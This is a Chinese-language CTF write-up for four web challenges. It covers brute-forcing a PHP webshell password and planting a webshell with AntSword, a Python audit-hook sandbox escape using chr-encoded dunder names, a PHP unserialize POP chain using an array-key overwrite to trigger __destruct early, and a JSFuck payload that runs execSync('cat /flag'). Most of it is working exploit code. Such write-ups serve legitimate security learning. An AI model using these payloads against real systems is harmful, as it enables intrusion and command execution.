SHCTF-3rd-Web-WP

Challenge Info - [

chrome_mVYWnZo06K 没钱起手，想买flag还缺47，看看源代码，发现提示

使用cyberchef解码拿到信息

msedge_NypgJhfoDY

说是有个shell.php，爆破一下看看有什么路径，（不小心把靶机扫爆了）根据提示我们来到这里

chrome_nuhdKeK7nL

发现php代码

<?php

if (isset($_GET['show'])) {
    highlight_file(__FILE__);
}

$pass = 'c4d038b4bed09fdb1471ef51ec3a32cd';

if (isset($_POST['key']) && md5($_POST['key']) === $pass) {
    if (isset($_POST['cmd'])) {
        system($_POST['cmd']);
    } elseif (isset($_POST['code'])) {
        eval($_POST['code']);
    }
} else {
    http_response_code(404);
}

找出passwd，其md5是c4d038b4bed09fdb1471ef51ec3a32cd

只要passwd对了就拿到shell

用神秘小脚本爆破一下简单的字符集，看到源码是114514

进去之后没发现有什么flag，写个小马进去（这里我最开始把马写在tmp目录下，蚁剑无法连接，Web服务被限制了，所以我们要写在/var/www/html里面

java_3IQvfhXsHz

AntSword_KqvtdhyAuf

ok,成功连接，看到它的钱数，我们给他改多就好了

AntSword_ZSRbr7jujF

Challenge Info - [

上来就是牢大Hacker out

点一下关于，发现上面有file=xxx，可能有路径穿越

读到源码

from flask import Flask, render_template_string, request, jsonify
import subprocess
import tempfile
import os
import sys

app = Flask(__name__)

@app.route('/')
def index():
    file_name = request.args.get('file', 'pages/index.html')
    try:
        with open(file_name, 'r', encoding='utf-8') as f:
            content = f.read()
    except Exception as e:
        with open('pages/index.html', 'r', encoding='utf-8') as f:
            content = f.read()
    return render_template_string(content)

def waf(code):
    blacklisted_keywords = [
        'import', 'open', 'read', 'write', 'exec', 'eval',
        '__', 'os', 'sys', 'subprocess', 'run', 'flag',
        '\'', '\"'
    ]
    for keyword in blacklisted_keywords:
        if keyword in code:
            return False
    return True

@app.route('/execute', methods=['POST'])
def execute_code():
    code = request.json.get('code', '')
    if not code:
        return jsonify({'error': '请输入Python代码'})
    if not waf(code):
        return jsonify({'error': 'Hacker!'})
    try:
        with tempfile.NamedTemporaryFile(mode='w', suffix='.py', delete=False) as f:
            f.write(f"""import sys
sys.modules['os'] = 'not allowed'

def is_my_love_event(event_name):
    return event_name.startswith("Nothing is my love but you.")

def my_audit_hook(event_name, arg):
    if len(event_name) > 0:
        raise RuntimeError("Too long event name!")
    if len(arg) > 0:
        raise RuntimeError("Too long arg!")
    if not is_my_love_event(event_name):
        raise RuntimeError("Hacker out!")

__import__('sys').addaudithook(my_audit_hook)

{code}""")
            temp_file_name = f.name

        result = subprocess.run(
            [sys.executable, temp_file_name],
            capture_output=True,
            text=True,
            timeout=10
        )

        os.unlink(temp_file_name)

        return jsonify({
            'stdout': result.stdout,
            'stderr': result.stderr
        })

    except subprocess.TimeoutExpired:
        return jsonify({'error': '代码执行超时（超过10秒）'})
    except Exception as e:
        return jsonify({'error': f'执行出错: {str(e)}'})
    finally:
        if os.path.exists(temp_file_name):
            os.unlink(temp_file_name)

if __name__ == '__main__':
    app.run(debug=True)

题目核心是 /execute 接口，它的逻辑如下：

接收 POST JSON {"code": "你的python代码"}
WAF 过滤：代码中不能出现 import, open, read, write, exec, eval, __, os, sys, subprocess, run, flag, ', "
如果通过 WAF，代码会被写入临时文件，并在审计钩子环境下执行：
- sys.modules['os'] = 'not allowed' → 无法直接 import os
- 注册了 my_audit_hook，任何 Python 操作都会触发
- 触发条件极其严格：事件名长度必须为 0、参数长度必须为 0、事件名必须以 "Nothing is my love but you." 开头

审计钩子虽然严格，但它使用了内置函数 len() 和自定义函数 is_my_love_event

如果我们能在审计钩子触发之前，覆写这两个函数，让它们返回符合要求的值，就能绕过

因为它的防御代码在我们代码之前，我们要修改 len 或者 is_my_love_event 的定义，下一次钩子再调用的时候用的就是我们的定义

len是内置函数，存在__builtins__这个字典里。

我们要先拿到__builtins__

Python 里，每个函数都有一个 __globals__ 属性，它是一个字典，里面存着这个函数能访问的所有全局变量

如何拿到一个对象？

从某个已知对象出发，比如空列表 []
获取它的类 [].__class__ → list
获取 list 的基类 [].__class__.__bases__[0] → object
获取 object 的所有子类 object.__subclasses__()
遍历这些子类，找到某个子类的 __init__.__globals__
里面就有 __builtins__

这个链条就是[] → __class__ → __bases__[0] → __subclasses__() → 某个子类 → __init__ → __globals__ → __builtins__

因为源码里面waf掉了__，我们不能直接写__class__，所以我们使用 chr(95) * 2 得到 "__"，拼接出__class__，如下

chr(95) + chr(95) + chr(99) + chr(108) + chr(97) + chr(115) + chr(115) + chr(95) + chr(95)

这样我们就绕过了黑名单，拿到字典

Payload，这里参考了RisingFan师傅的wp

clss = str().join(chr(x) for x in [0x5f,0x5f,0x63,0x6c,0x61,0x73,0x73,0x5f,0x5f])     
mro = str().join(chr(x) for x in [0x5f,0x5f,0x6d,0x72,0x6f,0x5f,0x5f])                
sclss = str().join(chr(x) for x in [0x5f,0x5f,0x73,0x75,0x62,0x63,0x6c,0x61,0x73,0x73,0x65,0x73,0x5f,0x5f]) 
it = str().join(chr(x) for x in [0x5f,0x5f,0x69,0x6e,0x69,0x74,0x5f,0x5f])           
gl = str().join(chr(x) for x in [0x5f,0x5f,0x67,0x6c,0x6f,0x62,0x61,0x6c,0x73,0x5f,0x5f])  
 
ss = str().join(chr(x) for x in [0x73,0x79,0x73,0x74,0x65,0x6d])   
s = str().join(chr(x) for x in [0x73,0x79,0x73])                   
cmd = str().join(chr(x) for x in [0x2f,0x72,0x65,0x61,0x64,0x5f,0x66,0x6c,0x61,0x67])
 
wrapc = str().join(chr(x) for x in [0x5f,0x77,0x72,0x61,0x70,0x5f,0x63,0x6c,0x6f,0x73,0x65])  
ne = str().join(chr(x) for x in [0x5f,0x5f,0x6e,0x61,0x6d,0x65,0x5f,0x5f])  
 
for i in getattr(getattr(getattr([],clss),mro)[1],sclss)():
    try:
        if (wrapc == str(getattr(i,ne))):
            is_my_love_event = lambda event: True
            len = lambda event: 0
            r = getattr(getattr(i,it),gl)[ss](cmd)
            print(r)
            break
    except Exception as e:
        print(e)
        break

flag因为权限读不到，目录下还有一个read_flag可以读到flag

chrome_CVDKrInUSg

chrome_eQlLUQmPMA

Challenge Info - [

PHP代码

<?php

highlight_file(__FILE__);
error_reporting(0);

class Sun{
    public $sun;
    public function __destruct(){
        die("Maybe you should fly to the ".$this->sun);
    }
}

class Solar{
    private $Sun;
    public $Mercury;
    public $Venus;
    public $Earth;
    public $Mars;
    public $Jupiter;
    public $Saturn;
    public $Uranus;
    public $Neptune;
    public function __set($name,$key){
        $this->Mars = $key;
        $Dyson = $this->Mercury;
        $Sphere = $this->Venus;
        $Dyson->$Sphere($this->Mars);
    }
    public function __call($func,$args){
        if(!preg_match("/exec|popen|popens|system|shell_exec|assert|eval|print|printf|array_keys|sleep|pack|array_pop|array_filter|highlight_file|show_source|file_put_contents|call_user_func|passthru|curl_exec/i", $args[0])){
            $exploar = new $func($args[0]);
            $road = $this->Jupiter;
            $exploar->$road($this->Saturn);
        }
        else{
            die("Black hole");
        }
    }
}

class Moon{
    public $nearside;
    public $farside;
    public function __tostring(){
        $starship = $this->nearside;
        $starship();
        return '';
    }
}

class Earth{
    public $onearth;
    public $inearth;
    public $outofearth;
    public function __invoke(){
        $oe = $this->onearth;
        $ie = $this->inearth;
        $ote = $this->outofearth;
        $oe->$ie = $ote;
    }
}



if(isset($_POST['travel'])){
    $a = unserialize($_POST['travel']);
    throw new Exception("How to Travel?");
}

我们的最终利用点是SplFileObject::fpassthru()

在 Solar::__call 里有：

$exploar = new $func($args[0]);
$road = $this->Jupiter;
$exploar->$road($this->Saturn);

因为黑名单过滤了很多直接读文件的函数（file_get_contents、fopen、readfile），但没有过滤 SplFileObject 类和它的 fpassthru 方法，所以我们要传入 $func="SplFileObject"、$args[0]="/flag"、$road="fpassthru"

SplFileObject是PHP原生文件操作类，fpassthru直接输出文件完整内容

而Solar::__call 能实例化自定义类并方法

public function __call($func, $args) {
    // $func: 类名
    // $args[0]: 构造参数
    // Jupiter: 方法名（如fpassthru）
    // Saturn: 方法参数
}

Solar::__call 在调用一个不存在的方法时触发。

public function __set($name, $key){
    // Mercury：$Dyson，是Solar
    // Venus：$Sphere，设置成 'SplFileObject'，Solar对象没有这个方法
    // Mars：赋给$key，可传'/flag'
    // 于是 $Dyson->$Sphere($this->Mars) 即 Solar->__call('SplFileObject', ['/flag'])
}

我们要对Solar设置一个未定义属性，使用到Earth::__invoke

public function __invoke(){
    $oe = $this->onearth;     // Solar对象
    $ie = $this->inearth;     // 比如 'xxx'
    $ote = $this->outofearth; // '/flag'
    $oe->$ie = $ote; // Solar->$xxx='/flag'，但是$xxx没有定义，触发Solar->__set($ie, '/flag')
}

__invoke的触发需要对象被当作函数调用，把Earth对象当成函数执行(Earth对象加括号)

于是我们找到Moon::__toString

public function __tostring(){
    $starship = $this->nearside;   // Earth对象
    $starship();                   // 直接Earth->__invoke()
}

于是我们要触发__toString，发现Sun::__destruct会拼接字符串涉及Moon对象

public function __destruct(){
    die("Maybe you should fly to the ".$this->sun); // $this->sun 是 Moon对象
    // Moon对象遇字符串拼接强转__toString --> Earth->__invoke ... 直到Solar->__call
}

但是…正常执行流程不会触发__destruct！怎么办？

让Sun对象在unserialize后"丢失引用"，马上触发__destruct

利用PHP的反序列化key覆盖机制：

使用数组：[0=>$sun, 1=>'dummy']
serialize后，字符串里有i:0;O:3:"Sun"....i:1;s:5:"dummy";
把i:1;改为i:0;，后面那个覆盖了前面位置，前者直接丢失引用，立即调用__destruct

整个链条：

Sun对象 → $sun = Moon
Moon对象 → $nearside = Earth
Earth对象 → $onearth = SolarA，$inearth任意，$outofearth='/flag'
SolarA → Mercury = SolarB, Venus='SplFileObject', Mars='/flag'
SolarB → Jupiter='fpassthru', Saturn=null
组合到array，反序列化后key覆盖
Sun::destruct触发，层层串联，SolarB->__call 读flag

exp：

<?php
class Sun { public $sun; }
class Moon { public $nearside; }
class Earth { public $onearth; public $inearth; public $outofearth; }
class Solar { public $Mercury; public $Venus; public $Jupiter; public $Saturn; public $Mars; }

// --- 构造主链 --- 
$sun = new Sun();
$sun->sun = new Moon();

// Moon链Earth
$earth = new Earth();
$sun->sun->nearside = $earth;

$earth->onearth = $solarA = new Solar();
$earth->inearth = "exploit";     // SolarA没有这个属性名即可
$earth->outofearth = "/flag";    // 要读的文件

$solarA->Mercury = $solarB = new Solar(); // Mercury是SolarB
$solarA->Venus = "SplFileObject";         // Venus是未定义方法名

$solarA->Mars = "/flag";                  // __set参数会传到Mars
$solarB->Jupiter = "fpassthru";           // 方法fpassthru可回显
$solarB->Saturn = null;                   // 参数可为null

// --- 准备覆盖key payload ---
$arr = [0 => $sun, 1 => "dummy"];
$ser = serialize($arr);
// 关键覆盖：使第一个对象失去引用，触发__destruct
$ser = preg_replace('/i:1;/', 'i:0;', $ser);

echo "urlencode后payload如下（POST于travel参数）：\n";
echo urlencode($ser);

原理详解

PHP的反序列化时，如果数组中有重复的key，比如
```
array(0 => $obj, 0 => "a")
```
- 后面的key会覆盖前面的，
- 被覆盖的对象立刻失去全部引用，
- 反序列化过程中对象"即将被销毁"，
- PHP内部会在此刻立即执行其__destruct()方法（准确说是反序列化“覆盖失去引用直接销毁”，并不是到GC环节才处理）。
官方手册：__destruct() 是在对象生命周期结束时自动调用
这个破坏利用方式被称作 “反序列化key覆盖/孤儿对象/覆盖提前析构"，本质是覆盖失去引用立即被销毁。

Challenge Info - [

什么愚蠢的计算器，我算个数都要Waf（一开始就按到8了）

chrome_3Wy7lMZKco

题目附件给了源码：

const express = require('express');
const app = express();
const port = 5000;

app.use(express.json());


const WAF = (recipe) => {
    const ALLOW_CHARS = /^[012345679!\.\-\+\*\/\(\)\[\]]+$/;
    if (ALLOW_CHARS.test(recipe)) {
        return true;
    }
    return false;
};


function calc(operator) {
    return eval(operator);
}

app.get('/', (req, res) => {
    res.sendFile(__dirname + '/index.html');
});


app.post('/calc', (req, res) => {
    const { expr } = req.body;
    console.log(expr);
    if(WAF(expr)){
        var result = calc(expr);
        res.json({ result });
    }else{
        res.json({"result":"WAF"});
    }
});


app.listen(port, () => {
    console.log(`Server running on port ${port}`);
});

路径 /calc 接收 POST JSON {"expr":"..."}

而且只允许!.-+*/()[]和9个数字(没有8)，题目明示jsfuck，这是一种利用[]()!+字符表示js语句的编码方式

在 Node.js 里，如果可以运行任意 JS 代码，最容易想到的“命令执行”写法如下：

JavaScript

require('child_process').execSync('cat /flag')

require('child_process') 加载核心模块 child_process
.execSync() 是它的方法（同步执行一条 shell 命令）
cat /flag 是要执行的命令，回显 flag 文件内容

而题目把require过滤掉了，所以要找一个间接调用

我们的payload：

global.process.mainModule.require('child_process').execSync('cat /flag')

payload可以去 [JSFuck - Write any JavaScript with 6 Characters: !+](https://jsfuck.com/) 生成

{"expr":"[][(![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+!+[]]+(+[![]]+[][(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(+(!+[]+!+[]+!+[]+[+!+[]]))[(!![]+[])[+[]]+(!![]+[][(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([]+[])[([][(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][[]]+[])[+!+[]]+(![]+[])[+!+[]]+((+[])[([][(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]]](!+[]+!+[]+!+[]+[!+[]+!+[]])+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]])()([][(![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+!+[]]+([]+[])[(![]+[])[+[]]+(!![]+[][(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(!![]+[])[+[]]+([][(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[][(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]()[+!+[]+[!+[]+!+[]]]+((!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(+(+!+[]+[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+[!+[]+!+[]]+[+[]])+[])[+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(+(+!+[]+[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+[!+[]+!+[]]+[+[]])+[])[+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+(![]+[])[+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(!![]+[])[+[]]+[+!+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+([][[]]+[])[!+[]+!+[]]+([][[]]+[])[+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(+(+!+[]+[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+[!+[]+!+[]]+[+[]])+[])[+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[+!+[]]+([][[]]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+([][[]]+[])[!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[+!+[]]+(+(+!+[]+[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+[!+[]+!+[]]+[+[]])+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[+!+[]]+([][[]]+[])[+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[+!+[]])[(![]+[])[!+[]+!+[]+!+[]]+(+(!+[]+!+[]+[+!+[]]+[+!+[]]))[(!![]+[])[+[]]+(!![]+[][(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([]+[])[([][(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][[]]+[])[+!+[]]+(![]+[])[+!+[]]+((+[])[([][(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]]](!+[]+!+[]+!+[]+[+!+[]])[+!+[]]+(![]+[])[!+[]+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[+[]]]((!![]+[])[+[]])[([][(!![]+[])[!+[]+!+[]+!+[]]+([][[]]+[])[+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]]()+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([![]]+[][[]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]](([][(![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+!+[]]+(![]+[+[]])[([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([][(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]]()[+!+[]+[+[]]]+![]+(![]+[+[]])[([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([][(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]]()[+!+[]+[+[]]])()[([][(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[+[]])[([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([][(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]]()[+!+[]+[+[]]])+[])[+!+[]])+([]+[])[(![]+[])[+[]]+(!![]+[][(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(!![]+[])[+[]]+([][(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[][(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]()[+!+[]+[!+[]+!+[]]])())"}

解析最后拿到的flag

msedge_oXiX85Q2OB